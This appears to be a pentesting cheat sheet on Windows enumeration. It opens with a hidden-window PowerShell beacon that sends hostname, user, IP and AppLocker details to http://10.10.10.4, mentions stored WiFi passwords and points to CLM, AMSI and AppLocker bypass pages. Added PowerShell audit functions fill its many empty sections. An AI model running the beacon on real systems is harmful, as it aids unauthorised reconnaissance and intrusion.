Windows

Introduction

This section contains some useful commands that will help you enumerate a Windows system, obtaining information that is helpful for later privilege escalation or lateral movement.

General information exfiltration

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -exec bypass -nop -w hidden -c iwr -UseBasicParsing -Uri "http://10.10.10.4/index.html?h=$(hostname)&x64=$([Environment]::Is64BitProcess)&u=$($env:USERNAME)&cd=$(Get-Location)&ip=$((Test-Connection -ComputerName (hostname) -Count 1).IPV4Address.IPAddressToString)&clm=$($ExecutionContext.SessionState.LanguageMode)&AppLockerS=$(Get-Service -Name "AppIDSvc" | Select-Object -ExpandProperty Status)&AppLockerR=$(Get-AppLockerPolicy -Effective | Select-Object -ExpandProperty RuleCollectionTypes | Format-List | Out-String)"

PowerShell History

C:\Users\<USER>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

User and group enumeration

whoami
echo %username%

Privileges

Displays the current user name, the groups the user belongs to, their security identifiers (SIDs), and the privileges held by the current user's access token.

whoami /all

Enumerate the Se* token privileges (SeXxxPrivilege) of the current user.

Groups
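The whoami checks above (user, groups, privileges) return plain text. The following is an added example, not code from the original page: it asks whoami for CSV output and turns the result into objects that can be filtered, exported, or compared against a baseline. The function name is mine; the column names are the ones whoami itself emits.

```powershell
# Added example, not from the original page: the "whoami" checks above as objects.
# whoami can emit CSV (/fo csv), which ConvertFrom-Csv turns into objects you can
# filter, compare against a baseline, or export.
function Get-TokenSummary {
    [CmdletBinding()]
    param()

    $user   = whoami /user   /fo csv | ConvertFrom-Csv   # columns: "User Name", SID
    $groups = whoami /groups /fo csv | ConvertFrom-Csv   # columns: "Group Name", Type, SID, Attributes
    $privs  = whoami /priv   /fo csv | ConvertFrom-Csv   # columns: "Privilege Name", Description, State

    [pscustomobject]@{
        UserName = $user.'User Name'           # same value as "echo %username%" in cmd or $env:USERNAME
        UserSid  = $user.SID
        # Attributes tells whether a group is "Mandatory group, Enabled by default, Enabled group"
        # or "Group used for deny only" (a group that only removes access).
        Groups   = @($groups | Select-Object 'Group Name', SID, Attributes)
        # Every privilege present in the token. Disabled privileges are still part of the
        # token (a process can enable them), so both states matter in an audit.
        Privileges        = @($privs | Select-Object 'Privilege Name', State)
        EnabledPrivileges = @($privs | Where-Object { $_.State -eq 'Enabled' } | ForEach-Object { $_.'Privilege Name' })
    }
}

# Usage: $t = Get-TokenSummary; $t.EnabledPrivileges; $t.Groups | Format-Table
```

The `/fo csv` switch is supported by all three whoami sub-commands, which is what makes the conversion reliable; `whoami /all` has no CSV form, so it is better read by eye.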

Operating system

  • Architecture:

  • General information:

  • Environment variables:

  • Hostname & Domain
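The four items above are usually gathered with systeminfo, ipconfig and the env: drive. As an added example (not from the original page), the following function collects the same data into one object; the function name and the property names are my choice, the CIM classes and .NET calls are the standard ones.

```powershell
# Added example, not from the original page: the "Operating system" items above
# (architecture, general information, environment variables, hostname and domain)
# collected into one object, the same data "systeminfo" prints but in a filterable form.
function Get-HostInfo {
    [CmdletBinding()]
    param()

    $os = Get-CimInstance -ClassName Win32_OperatingSystem
    $cs = Get-CimInstance -ClassName Win32_ComputerSystem

    # Environment variables as a sorted, ordered dictionary (PATH and tool-specific
    # variables often reveal what is installed on the host).
    $envVars = [ordered]@{}
    Get-ChildItem -Path Env: | Sort-Object Name | ForEach-Object { $envVars[$_.Name] = $_.Value }

    [pscustomobject]@{
        Hostname       = $env:COMPUTERNAME
        # Domain holds the workgroup name when PartOfDomain is $false.
        Domain         = $cs.Domain
        DomainJoined   = $cs.PartOfDomain
        DnsDomain      = $env:USERDNSDOMAIN       # empty for local (non-domain) logons
        OsName         = $os.Caption
        OsVersion      = $os.Version
        OsBuild        = $os.BuildNumber
        OsArchitecture = $os.OSArchitecture       # "64-bit" / "32-bit"
        # A 32-bit PowerShell on a 64-bit OS is common; both values are reported because
        # Is64BitProcess (the x64 field of the one-liner above) only describes this process.
        Is64BitOS      = [Environment]::Is64BitOperatingSystem
        Is64BitProcess = [Environment]::Is64BitProcess
        LastBoot       = $os.LastBootUpTime
        InstallDate    = $os.InstallDate
        Environment    = $envVars
    }
}

# Usage: Get-HostInfo | Format-List; (Get-HostInfo).Environment['PATH'] -split ';'
```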

Network enumeration

  • Hardcoded domains:

The file /etc/hosts also exists on Windows, under the following path.

  • Port enumeration:

  • Display routing table:

  • Network configuration:

  • Shares:

  • SMB Signing enabled

  • View computers on your network:

  • Status Firewall / AV / Windows Defender

  • WiFi passwords: on Windows 10 we can obtain the WiFi password of every access point (AP) the computer has ever connected to.

  • Show ARP tables:
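The list above is normally worked through with netstat, route, ipconfig, net share, net view, netsh and arp. As an added example (not part of the original page), the function below runs the same checks with the cmdlets that ship with Windows 8/2012 and later and returns one object, so the results can be kept as a baseline. The function and property names are mine; the cmdlets, the hosts-file path and the WLAN profile listing are standard. It deliberately lists only WLAN profile names, not their keys.

```powershell
# Added example, not from the original page: the network checks listed above as one
# function returning an object. It uses the NetTCPIP, SmbShare, NetSecurity and
# Defender modules that ship with Windows 8/2012 and later; netstat, route, arp,
# ipconfig and net view give the same data on older systems.
function Get-NetworkPosture {
    [CmdletBinding()]
    param()

    # Hardcoded name resolution: the Windows hosts file, with comments and blank lines dropped.
    $hostsPath = Join-Path $env:SystemRoot 'System32\drivers\etc\hosts'
    $hostsEntries = @(Get-Content -Path $hostsPath -ErrorAction SilentlyContinue |
        Where-Object { $_.Trim() -and $_ -notmatch '^\s*#' })

    # Listening TCP ports with the owning process (what "netstat -ano" shows, resolved to a name).
    $listening = Get-NetTCPConnection -State Listen | Select-Object LocalAddress, LocalPort, OwningProcess,
        @{ Name = 'Process'; Expression = { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).ProcessName } }

    $routes   = Get-NetRoute -AddressFamily IPv4 | Select-Object DestinationPrefix, NextHop, InterfaceAlias, RouteMetric
    $ipConfig = Get-NetIPConfiguration | Select-Object InterfaceAlias, IPv4Address, IPv4DefaultGateway, DNSServer

    # Shares exposed by this host (ADMIN$, C$ and IPC$ exist by default on most builds).
    $shares = Get-SmbShare | Select-Object Name, Path, Description

    # SMB signing: only RequireSecuritySignature = True stops relaying of this host's SMB sessions;
    # "Enable" alone merely offers signing to peers that ask for it.
    $smbServer = Get-SmbServerConfiguration | Select-Object EnableSecuritySignature, RequireSecuritySignature
    $smbClient = Get-SmbClientConfiguration | Select-Object EnableSecuritySignature, RequireSecuritySignature

    $firewall = Get-NetFirewallProfile | Select-Object Name, Enabled, DefaultInboundAction
    $defender = $null   # Get-MpComputerStatus only exists where Defender is installed
    try { $defender = Get-MpComputerStatus -ErrorAction Stop |
              Select-Object AntivirusEnabled, RealTimeProtectionEnabled, AMServiceEnabled } catch { }

    # Stored WLAN profile names only (no keys). netsh prints text, so the "... Profile : <name>"
    # lines are parsed; the label is localised on non-English systems.
    $wlanProfiles = @(netsh wlan show profiles 2>$null | ForEach-Object {
        if ($_ -match 'Profile\s*:\s*(.+)$') { $Matches[1].Trim() } })

    # Computers visible through the browser service ("net view"); often empty on modern networks.
    $neighbours = @(net view 2>$null | Where-Object { $_ -match '^\\\\' })

    # ARP cache ("arp -a"), skipping entries that never resolved.
    $arp = Get-NetNeighbor -AddressFamily IPv4 | Where-Object { $_.State -ne 'Unreachable' } |
        Select-Object IPAddress, LinkLayerAddress, State, InterfaceAlias

    [pscustomobject]@{
        HostsEntries = $hostsEntries; Listening = $listening; Routes = $routes; IpConfig = $ipConfig
        Shares = $shares; SmbServerSigning = $smbServer; SmbClientSigning = $smbClient
        Firewall = $firewall; Defender = $defender; WlanProfiles = $wlanProfiles
        NetworkComputers = $neighbours; ArpCache = $arp
    }
}

# Usage: $n = Get-NetworkPosture; $n.SmbServerSigning; $n.Listening | Format-Table
```

On a host where one of the modules is missing (Server Core without the Defender feature, for example) the corresponding property is simply empty; everything else still runs.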

Constrained Language Mode (CLM)

Constrained Language Mode is a security feature designed to restrict the capabilities of PowerShell scripts, making them more secure and less prone to exploitation. When Constrained Language Mode is enabled, PowerShell restricts the use of certain language elements and cmdlets to help prevent potential malicious activities.

To bypass this countermeasure go to Countermeasure Evasion - CLM
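The language mode itself is read from `$ExecutionContext.SessionState.LanguageMode` (the `clm=` field of the one-liner at the top of this page). As an added example, not from the original page, the function below reports that value and also verifies that the restriction is really enforced, by attempting a method call on a .NET type that Constrained Language Mode does not treat as a core type. The function name is mine.

```powershell
# Added example, not from the original page: report the language mode of the
# current PowerShell session and verify that the restriction is actually enforced.
function Test-LanguageMode {
    [CmdletBinding()]
    param()

    $mode = $ExecutionContext.SessionState.LanguageMode

    # In ConstrainedLanguage mode, method calls are only allowed on a small set of
    # core types. System.Net.Dns is not one of them, so this harmless call fails with
    # "Cannot invoke method. Method invocation is supported only on core types".
    $nonCoreCallAllowed = $true
    try {
        $null = [System.Net.Dns]::GetHostName()
    } catch {
        $nonCoreCallAllowed = $false
    }

    [pscustomobject]@{
        LanguageMode       = [string]$mode
        Constrained        = ($mode -eq 'ConstrainedLanguage')
        NonCoreCallAllowed = $nonCoreCallAllowed
        # FullLanguage should go together with the call succeeding, ConstrainedLanguage
        # with it failing; anything else means the reported mode and the behaviour disagree.
        Consistent         = (($mode -eq 'FullLanguage') -eq $nonCoreCallAllowed)
    }
}

# Usage: Test-LanguageMode | Format-List
```

CLM is normally applied through an AppLocker or WDAC script policy, which is why the AppLocker checks further down belong to the same picture: a session that reports FullLanguage for a standard user means no such policy applies to that user.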

AMSI

AMSI stands for Antimalware Scan Interface, and it is a security feature in Windows designed to help protect against script-based malware.

There are several ways to check if AMSI is enabled:

To bypass this countermeasure go to Countermeasure Evasion - AMSI
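The usual indicators are the registered AMSI providers in the registry, whether amsi.dll is loaded in the PowerShell process, and Defender's own status. As an added example, not from the original page, the following function gathers those three into one object; the function name and the verdict property are mine, the registry key, module name and cmdlet are the standard ones.

```powershell
# Added example, not from the original page: three independent indicators of whether
# AMSI is active for the current PowerShell process, returned as one object so the
# result can be recorded alongside the CLM and AppLocker checks.
function Test-AmsiStatus {
    [CmdletBinding()]
    param()

    # 1. Registered providers: every antimalware engine that implements AMSI registers
    #    its COM CLSID as a subkey here. No subkeys means nothing receives scan requests.
    $providerKey = 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers'
    $providers = @(Get-ChildItem -Path $providerKey -ErrorAction SilentlyContinue | ForEach-Object { $_.PSChildName })

    # 2. amsi.dll in this process. PowerShell loads it when it first submits content for
    #    scanning; by the time this function has been defined and called that has normally happened.
    $amsiLoaded = [bool]((Get-Process -Id $PID).Modules | Where-Object { $_.ModuleName -eq 'amsi.dll' })

    # 3. Defender's own flag; the cmdlet only exists where Defender is installed.
    $amService = $null
    try { $amService = (Get-MpComputerStatus -ErrorAction Stop).AMServiceEnabled } catch { }

    [pscustomobject]@{
        ProviderClsids   = $providers
        AmsiDllLoaded    = $amsiLoaded
        AMServiceEnabled = $amService
        # Conservative verdict: a provider is registered and the DLL is in the process.
        Active           = ($providers.Count -gt 0 -and $amsiLoaded)
    }
}

# Usage: Test-AmsiStatus | Format-List
```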

AppLocker

AppLocker is a security feature in Windows operating systems that allows administrators to control which applications and executable files are allowed to run on a system. It provides a way to define and enforce application whitelisting policies, helping organizations enhance their security by preventing the execution of unauthorized or potentially malicious software.

You can check if AppLocker is enabled with the following command.

Obtain AppLocker rules:

To bypass this countermeasure go to Countermeasure Evasion - AppLocker.
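The checks above are the AppIDSvc service state and Get-AppLockerPolicy -Effective. As an added example (not from the original page), the two functions below use the built-in AppLocker module to flatten the effective policy into one row per rule, show which collections are enforced versus audit-only, and ask the policy what it would decide for a given path without executing anything. Function names are mine; the XML attribute names are those of the AppLocker policy schema.

```powershell
# Added example, not from the original page: the AppLocker checks above as two functions.
# Get-AppLockerRuleSummary reports the AppIDSvc state and flattens the effective policy
# to one row per rule; Test-AppLockerPath asks the policy what it would decide for a
# path without running anything. Both use the built-in AppLocker module.
function Get-AppLockerRuleSummary {
    [CmdletBinding()]
    param()

    # AppLocker only enforces while the Application Identity service is running.
    $svc = Get-Service -Name AppIDSvc -ErrorAction SilentlyContinue
    $svcStatus = if ($svc) { [string]$svc.Status } else { 'NotInstalled' }

    # -Xml returns the merged (local + GPO) policy as text; the XML is easier to walk than the object model.
    [xml]$policy = Get-AppLockerPolicy -Effective -Xml

    $collections = @(); $rules = @()
    foreach ($collection in $policy.AppLockerPolicy.RuleCollection) {
        # GetAttribute avoids clashes with the XmlElement's own properties (e.g. Name).
        $type = $collection.GetAttribute('Type')                     # Exe, Dll, Script, Msi, Appx
        $mode = $collection.GetAttribute('EnforcementMode')          # Enabled, AuditOnly or NotConfigured
        $collections += [pscustomobject]@{ Collection = $type; EnforcementMode = $mode }
        foreach ($rule in $collection.ChildNodes) {                   # FilePathRule / FilePublisherRule / FileHashRule
            $rules += [pscustomobject]@{
                Collection     = $type
                RuleType       = $rule.LocalName
                Name           = $rule.GetAttribute('Name')
                Action         = $rule.GetAttribute('Action')          # Allow or Deny
                UserOrGroupSid = $rule.GetAttribute('UserOrGroupSid')  # S-1-1-0 is Everyone
            }
        }
    }

    [pscustomobject]@{ AppIDSvc = $svcStatus; Collections = $collections; Rules = $rules }
}

function Test-AppLockerPath {
    param(
        [Parameter(Mandatory)][string[]]$Path,
        [string]$User = 'Everyone'      # evaluate as this user or group instead of the caller
    )
    # PolicyDecision is Allowed, Denied or DeniedByDefault; MatchingRule names the rule that decided.
    Get-AppLockerPolicy -Effective | Test-AppLockerPolicy -Path $Path -User $User |
        Select-Object FilePath, PolicyDecision, MatchingRule
}

# Usage: (Get-AppLockerRuleSummary).Collections
#        Test-AppLockerPath -Path "$env:SystemRoot\System32\cmd.exe", "$env:TEMP\unsigned.exe"
```

A collection in AuditOnly mode writes events to the AppLocker log but blocks nothing, so EnforcementMode is the first thing to read; a rule set that looks strict is irrelevant until the mode is Enabled and AppIDSvc is running.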

Files Enumeration

PowerShell History

Disks

There are several ways to obtain the mounted disks on the system.

Alternate Data Streams

Alternate Data Streams (ADS) are a feature of the NTFS file system. On NTFS a file is made up of several attributes, one of which is $DATA, the data attribute. Looking at the regular data stream of a text file there is no mystery: it simply contains the text of the file. But that is only the primary data stream.

This one is sometimes referred to as the unnamed data stream, since the name string of this attribute is empty (""). Any data stream that has a name is therefore considered an alternate data stream.

Find alternate data streams in a directory.

If you want to search a directory or drive for ADS you can use this command in the root of the target:

Adding data to an alternate data stream.

Read Alternate Data Streams.
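The three operations above (find, add, read) map onto the -Stream parameter of Get-Item, Set-Content and Get-Content (dir /r is the cmd equivalent of the listing). As an added example, not from the original page, the function below performs all three against a throwaway file under %TEMP% and cleans up afterwards, so it can be run safely; the function name, the stream name "hidden" and the file contents are constructed for the demo.

```powershell
# Added example, not from the original page: the three ADS operations above (find, add,
# read) against a throwaway file in %TEMP%, so it is safe to run anywhere.
function Invoke-AdsDemo {
    [CmdletBinding()]
    param()

    $dir  = Join-Path $env:TEMP ('ads-demo-' + [guid]::NewGuid())
    $null = New-Item -ItemType Directory -Path $dir
    $file = Join-Path $dir 'notes.txt'
    Set-Content -Path $file -Value 'visible text'                      # primary (unnamed) stream
    Set-Content -Path $file -Stream 'hidden' -Value 'text in an ADS'   # add: named stream "hidden"

    # Find: every stream except the unnamed one (":$DATA") is an alternate stream.
    # Zone.Identifier is the common legitimate ADS (mark-of-the-web on downloaded files).
    $alternates = @(Get-ChildItem -Path $dir -Recurse -File |
        Get-Item -Stream * -ErrorAction SilentlyContinue |
        Where-Object { $_.Stream -ne ':$DATA' } |
        Select-Object FileName, Stream, Length)

    # Read: the data comes back through -Stream exactly like a normal file.
    $content = Get-Content -Path $file -Stream 'hidden'

    # A plain directory listing never shows the stream; the reported size is the primary stream only.
    $visibleSize = (Get-Item -Path $file).Length

    Remove-Item -Path $dir -Recurse -Force
    [pscustomobject]@{ AlternateStreams = $alternates; HiddenContent = $content; VisibleSize = $visibleSize }
}

# Usage: Invoke-AdsDemo | Format-List
```

The find pipeline is the part worth keeping: pointed at a drive root instead of $dir, it lists every named stream on the volume, which is the sweep a responder runs when looking for data hidden this way.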

Permissions

Windows permission terminology can be quite challenging to understand. In this subsection, you will find how to obtain the attributes and their meaning.

Simple Rights

Mask | Permission
-----|------------------------
F    | Full access
M    | Modify access
RX   | Read and execute access
R    | Read-only access
W    | Write-only access

Specific Rights

Mask | Permission
-----|-------------------------------
D    | Delete
RC   | Read control
WDAC | Write DAC
WO   | Write owner
S    | Synchronize
AS   | Access system security
MA   | Maximum allowed
GR   | Generic read
GW   | Generic write
GE   | Generic execute
GA   | Generic all
RD   | Read data / list directory
WD   | Write data / add file
AD   | Append data / add subdirectory
REA  | Read extended attributes
WEA  | Write extended attributes
X    | Execute
DC   | Delete child
RA   | Read attributes
WA   | Write attributes

Inheritance rights (applied only to directories)

Mask | Permission
-----|------------------------------------------
OI   | Object inherit
CI   | Container inherit
IO   | Inherit only
NP   | Do not propagate inherit
I    | Permission inherited from parent container
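The three tables above describe the tokens icacls prints after each identity, e.g. "(I)(OI)(CI)(RX)". As an added example (not from the original page), the following decodes those strings into objects using exactly those tables. The lookup tables reproduce the page; the function name and the sample lines are mine, the sample being constructed to look like the output of "icacls C:\Temp\Share".

```powershell
# Added example, not from the original page: decode the permission strings icacls prints
# (for example "(I)(OI)(CI)(RX)") using the three tables above. The sample lines at the
# bottom are constructed; live output works the same way:  icacls $p | ConvertFrom-IcaclsOutput -Path $p
$IcaclsRights = @{
    'F'   = 'Full access';             'M'   = 'Modify access';       'RX' = 'Read and execute access'
    'R'   = 'Read-only access';        'W'   = 'Write-only access';   'D'  = 'Delete'
    'RC'  = 'Read control';            'WDAC'= 'Write DAC';           'WO' = 'Write owner'
    'S'   = 'Synchronize';             'AS'  = 'Access system security'; 'MA' = 'Maximum allowed'
    'GR'  = 'Generic read';            'GW'  = 'Generic write';       'GE' = 'Generic execute'
    'GA'  = 'Generic all';             'RD'  = 'Read data / list directory'
    'WD'  = 'Write data / add file';   'AD'  = 'Append data / add subdirectory'
    'REA' = 'Read extended attributes'; 'WEA' = 'Write extended attributes'; 'X' = 'Execute'
    'DC'  = 'Delete child';            'RA'  = 'Read attributes';     'WA' = 'Write attributes'
}
$IcaclsInheritance = @{
    'OI' = 'Object inherit'; 'CI' = 'Container inherit'; 'IO' = 'Inherit only'; 'NP' = 'Do not propagate inherit'
}

function ConvertFrom-IcaclsOutput {
    param(
        [Parameter(Mandatory, ValueFromPipeline)][string[]]$Lines,
        [string]$Path = ''   # the path given to icacls; it prefixes the first line and is stripped
    )
    process {
        foreach ($line in $Lines) {
            $text = $line.Trim()
            if ($Path -and $text.StartsWith($Path, [StringComparison]::OrdinalIgnoreCase)) {
                $text = $text.Substring($Path.Length).Trim()
            }
            # "<identity>:(token)(token)..."; blank and "Successfully processed" lines do not match.
            if (-not ($text -match '^(?<id>[^:]+):(?<aces>(?:\([^)]*\))+)$')) { continue }
            $identity = $Matches.id; $aceText = $Matches.aces
            $type = 'Allow'; $inherited = $false; $inheritance = @(); $rights = @()
            foreach ($m in [regex]::Matches($aceText, '\(([^)]*)\)')) {
                $token = $m.Groups[1].Value
                if ($token -eq 'DENY') { $type = 'Deny'; continue }       # icacls marks deny ACEs this way
                if ($token -eq 'I')    { $inherited = $true; continue }   # "(I)" from the inheritance table
                if ($IcaclsInheritance.ContainsKey($token)) { $inheritance += $IcaclsInheritance[$token]; continue }
                foreach ($r in ($token -split ',')) {                     # specific rights come comma-separated
                    $name = if ($IcaclsRights.ContainsKey($r)) { $IcaclsRights[$r] } else { "Unknown($r)" }
                    $rights += $name
                }
            }
            [pscustomobject]@{ Identity = $identity; Type = $type; Inherited = $inherited
                               Inheritance = $inheritance; Rights = $rights }
        }
    }
}

# Constructed sample, shaped like the output of "icacls C:\Temp\Share".
$SampleIcacls = @(
    'C:\Temp\Share BUILTIN\Administrators:(I)(OI)(CI)(F)',
    '              NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)',
    '              BUILTIN\Users:(I)(OI)(CI)(RX)',
    '              Everyone:(OI)(CI)(DENY)(WD,AD)',
    '',
    'Successfully processed 1 files; Failed processing 0 files'
)
$SampleIcacls | ConvertFrom-IcaclsOutput -Path 'C:\Temp\Share' | Format-Table Identity, Type, Inherited, Rights
```

Hashtable keys are case-insensitive in PowerShell, so the occasional lower-case token icacls emits still resolves; anything not in the tables is reported as Unknown(...) rather than silently dropped.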

Service rights

Each ACE in the SDDL string starts with its type: A represents Allow, and the opposite, Deny, would be represented by D.

Mask | Permission                    | Meaning
-----|-------------------------------|------------------------------------------------------
CC   | SERVICE_QUERY_CONFIG          | Ask the SCM for the service's current configuration
LC   | SERVICE_QUERY_STATUS          | Ask the SCM for the service's current status
SW   | SERVICE_ENUMERATE_DEPENDENTS  | List dependent services
LO   | SERVICE_INTERROGATE           | Ask the service its current status
CR   | SERVICE_USER_DEFINED_CONTROL  | Send a service control defined by the service's author
RC   | READ_CONTROL                  | Read the security descriptor on this service
RP   | SERVICE_START                 | Start the service
WP   | SERVICE_STOP                  | Stop the service
DT   | SERVICE_PAUSE_CONTINUE        | Pause or continue the service
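The letters in the table are the two-character access codes inside the SDDL string that "sc sdshow <service>" prints. As an added example (not from the original page), the following decodes such a string into one object per ACE using the table above; it goes slightly beyond the page by adding four standard codes the table omits (DC = SERVICE_CHANGE_CONFIG, SD = DELETE, WD = WRITE_DAC, WO = WRITE_OWNER), which appear in almost every service descriptor. The function names, the principal abbreviations and the sample descriptor are mine (the sample is constructed to match the descriptor many default services carry).

```powershell
# Added example, not from the original page: decode the SDDL that "sc sdshow <service>"
# prints, using the service-rights table above plus four standard codes it omits
# (DC, SD, WD, WO). The sample descriptor at the bottom is constructed for the demo.
$ServiceRights = @{
    'CC' = 'SERVICE_QUERY_CONFIG';         'DC' = 'SERVICE_CHANGE_CONFIG';  'LC' = 'SERVICE_QUERY_STATUS'
    'SW' = 'SERVICE_ENUMERATE_DEPENDENTS'; 'LO' = 'SERVICE_INTERROGATE';    'CR' = 'SERVICE_USER_DEFINED_CONTROL'
    'RP' = 'SERVICE_START';                'WP' = 'SERVICE_STOP';           'DT' = 'SERVICE_PAUSE_CONTINUE'
    'RC' = 'READ_CONTROL';                 'SD' = 'DELETE';                 'WD' = 'WRITE_DAC'; 'WO' = 'WRITE_OWNER'
}
# SDDL abbreviations for principals that appear in service descriptors (as a SID, WD is Everyone).
$SddlPrincipals = @{
    'SY' = 'NT AUTHORITY\SYSTEM'; 'BA' = 'BUILTIN\Administrators'; 'BU' = 'BUILTIN\Users'
    'IU' = 'Interactive users';   'SU' = 'Service logon users';    'AU' = 'Authenticated users'; 'WD' = 'Everyone'
}
# Rights that let the holder reconfigure, replace or re-ACL the service; an Allow ACE granting
# any of them to a principal other than SYSTEM or Administrators deserves review.
$SensitiveServiceRights = 'SERVICE_CHANGE_CONFIG', 'WRITE_DAC', 'WRITE_OWNER', 'DELETE'

function ConvertFrom-ServiceSddl {
    param([Parameter(Mandatory)][string]$Sddl)
    # Every ACE is "(type;flags;rights;objectguid;inheritguid;sid)"; D: holds the DACL, S: the SACL.
    foreach ($m in [regex]::Matches($Sddl, '\(([^)]*)\)')) {
        $f = $m.Groups[1].Value -split ';'
        if ($f.Count -lt 6) { continue }
        $type = switch ($f[0]) { 'A' { 'Allow' } 'D' { 'Deny' } 'AU' { 'Audit' } default { $f[0] } }
        $rights = @()
        if ($f[2] -like '0x*') {
            $rights += "Raw mask $($f[2])"                  # SDDL may carry a hex mask instead of letters
        } else {
            for ($i = 0; $i + 1 -lt $f[2].Length; $i += 2) { # rights are two-letter codes
                $pair = $f[2].Substring($i, 2)
                $name = if ($ServiceRights.ContainsKey($pair)) { $ServiceRights[$pair] } else { "Unknown($pair)" }
                $rights += $name
            }
        }
        $sid = $f[5]
        $principal = if ($SddlPrincipals.ContainsKey($sid)) { $SddlPrincipals[$sid] } else {
            # Full SIDs (S-1-5-21-...) are translated to an account name when the machine can resolve them.
            try { (New-Object System.Security.Principal.SecurityIdentifier $sid).Translate([System.Security.Principal.NTAccount]).Value } catch { $sid }
        }
        $sensitive = @($rights | Where-Object { $SensitiveServiceRights -contains $_ })
        [pscustomobject]@{ Type = $type; Principal = $principal; Sid = $sid; Rights = $rights; Sensitive = $sensitive
                           Review = ($type -eq 'Allow' -and $sensitive.Count -gt 0 -and ('SY','BA') -notcontains $sid) }
    }
}

function Get-ServiceSddl {
    param([Parameter(Mandatory)][string]$Name)
    # "sc" alone is an alias for Set-Content in PowerShell, so call sc.exe explicitly.
    $sddl = (sc.exe sdshow $Name | Where-Object { $_.Trim() }) -join ''
    ConvertFrom-ServiceSddl -Sddl $sddl
}

# Constructed sample: the descriptor many default services carry.
$SampleSddl = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'
ConvertFrom-ServiceSddl -Sddl $SampleSddl | Format-Table Type, Principal, Review, Rights
```

Running Get-ServiceSddl over Get-Service and keeping the rows where Review is $true is the quick way to find services whose configuration can be changed by ordinary users, which is the misconfiguration this table is usually consulted for.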

List Installed HotFixes

List all installed patches on the system.

Running processes

Scheduled Tasks

List/enumerate all the scheduled tasks present on the system.
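The last three sections (installed hotfixes, running processes, scheduled tasks) are usually listed with wmic qfe, tasklist and schtasks /query. As an added example, not from the original page, the function below produces the same three listings as objects with the fields an analyst compares against a baseline: KB and install date for patches, image path, owner and parent for processes, and the command and principal for each scheduled task. The function and property names are mine; the CIM classes and cmdlets are built in.

```powershell
# Added example, not from the original page: hotfixes, running processes and scheduled
# tasks as objects, with the fields usually compared against a baseline.
function Get-HostActivitySnapshot {
    [CmdletBinding()]
    param()

    # Installed updates: HotFixID is the KB number; equivalent to "wmic qfe list".
    $hotfixes = Get-HotFix | Sort-Object InstalledOn | Select-Object HotFixID, Description, InstalledOn

    # Processes with image path and owning user. Path/owner are $null when access is denied
    # (typical for protected system processes when running as a standard user).
    $procs = Get-CimInstance -ClassName Win32_Process | ForEach-Object {
        $owner = Invoke-CimMethod -InputObject $_ -MethodName GetOwner -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Pid         = $_.ProcessId
            Name        = $_.Name
            Path        = $_.ExecutablePath
            Owner       = if ($owner -and $owner.User) { "$($owner.Domain)\$($owner.User)" } else { $null }
            ParentPid   = $_.ParentProcessId
            CommandLine = $_.CommandLine
        }
    }

    # Scheduled tasks with what they run and as whom; tasks outside \Microsoft\ are usually
    # third-party or custom and are the first ones to review.
    $tasks = Get-ScheduledTask | ForEach-Object {
        $t = $_
        [pscustomobject]@{
            Path     = $t.TaskPath + $t.TaskName
            State    = [string]$t.State
            RunAs    = $t.Principal.UserId
            RunLevel = [string]$t.Principal.RunLevel          # Limited or Highest
            Actions  = @($t.Actions | ForEach-Object { ($_.Execute + ' ' + $_.Arguments).Trim() })
            Custom   = -not $t.TaskPath.StartsWith('\Microsoft\')
        }
    }

    [pscustomobject]@{ HotFixes = $hotfixes; Processes = $procs; ScheduledTasks = $tasks }
}

# Usage: $s = Get-HostActivitySnapshot
#        $s.ScheduledTasks | Where-Object Custom | Format-Table Path, RunAs, RunLevel, Actions
#        $s.Processes | Where-Object { -not $_.Path } | Format-Table Pid, Name, Owner
```

Actions is empty for COM-handler tasks, which have a ClassId instead of an executable; those are worth resolving separately through the registry if the task is otherwise unexpected.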
